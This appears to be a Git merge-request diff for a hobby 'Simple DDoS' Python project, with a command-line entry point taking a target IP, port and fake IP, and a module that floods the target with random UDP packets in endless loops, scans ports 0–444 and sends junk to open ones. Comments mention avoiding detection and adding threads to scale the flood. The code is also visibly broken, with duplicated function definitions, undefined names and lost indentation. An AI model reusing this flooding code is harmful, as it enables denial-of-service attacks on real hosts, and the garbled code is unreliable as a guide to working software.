Create new branch to simplify things #1

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twhite96 merged 2 commits from fix/simplify into main 2023-11-15 19:54:20 -05:00
3 changed files with 72 additions and 69 deletions

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__init__.py Normal file
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"""Top-level package for Simple DDoS."""
# simple_ddos/__init__.py
__app_name__ = 'simple_ddos'
__version__ = "0.1.0"

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#!/usr/bin/python
import argparse
from src import ddos
def main():
parser = argparse.ArgumentParser(description="DDoS Proof of concept")
parser.add_argument('-t', '--target', help="Attack target IP address")
parser.add_argument('-p', '--port', help="Port to attack")
parser.add_argument('-i', '--ipaddress', help="Fake ip address")
args = parser.parse_args(ddos)
if __name__ == "__main__":
main()

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import os
import platform
import sys, socket
import random
from datetime import datetime as dt
# import threading
import socket
# os.system('figlet Simple DDoS | lolcat')
# TODO: Read docs on time, os, random, threading, and platform
# TODO: Take questions to Mastodon
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C = '\033[36m'
W = '\033[0m'
# v1: just create ddos script
# Instead of using SOCK_STREAM for TCP connections
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# TODO: research ipv6
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes1 = random.randbytes(2000)
bytes2 = random.randbytes(2900)
system = platform.uname().system
# this is better system = getattr(platform.uname(), "system")
# instead of hardcoding a specific index
# because if something in the l
def check_os():
if system == 'Windows':
os.system("cls")
elif system == 'Unix':
os.system("clear")
class DDoS:
pass
def __init__(self, target, port, ip):
self.target = target
self.port = port
self.ip = ip
# call function to check what system is used
# Why use a try
def ddos(target, port, ipaddress):
def ddos(target, port):
sent = 0
try:
while True:
sock.sendto(bytes1, (target, port))
sent = sent + 1
if len(sys.argv) != 3:
print('\n' + R + '[!]' + R + 'Invalid amount of arguments')
print('\n' + 'Syntax: python3 ddos.py <ip> <port>')
print("Sending %s packets to %s through port:%s" % (sent, ipaddress, port))
print("-" * 25)
print(f"Attacking target:{target} on {port}")
print("Time started:" + str(dt.now()))
else:
socket.gethostbyname(sys.argv[1])
try:
# create an infinite loop to continuously send junk data
# to target ip
while True:
sock.sendto(bytes2, (target, port))
# Create a new socket
# assign socket to s
# Iterate over ports to find the open ones on
# common DNS protocol ports
for port in range(0,445):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set the timeout for 5 seconds
# I changed it from 5 seconds to 1
# because each iteration over a port should not
# take more than 1 second
# If it did, perhaps it would be detected
# quickly and shutdown
socket.setdefaulttimeout(1)
# Connect to target and port
# using connect_ex to raise an
# exception instead of just s.connect
# Assign the connection a variable res
res = s.connect_ex((target, port))
if res != 1:
pass
# Check open ports by
#
else:
print(f"Port {port} is open on {target}")
print("Connected")
# create a variable that will send 4000 random bytes
# 4000 bytes is not enough to DDoS a target.
# Will need to test with more.
bytes1: bytes = random.randbytes(4000)
# bytes2 = random.randbytes(4000)
# system = platform.uname().system
# send 4000 random bytes to the target on port passed as arg
s.sendto(bytes1, (target, port))
sent = sent + 1
print("Sending %s packets to %s through port:%s" % (sent, ipaddress, port))
# Break out of infinite loop
except KeyboardInterrupt:
print('\n' + R + '[!]' + C + 'Keyboard Interrupt. Terminating session...' + W)
print('\n' + R + '[!]' + C + 'Terminating Session...' + W)
sys.exit()
except socket.gaierror:
print(R + '[-] ' + C + 'Unknown address.')
print(R + '[-] ' + C + 'Please input the correct ip address.')
sys.exit()
except NameError:
print(R + '[-] ' + C + 'Unknown address.')
print(R + '[-] ' + C + 'Please input the correct ip address.')
# For introducing to the script later
# for i in range(150):
# thread = threading.Thread(target=ddos)
# thread.start()
except socket.error:
print(R + '[-] ' + C + "Couldn't connect to server.")
socket.close()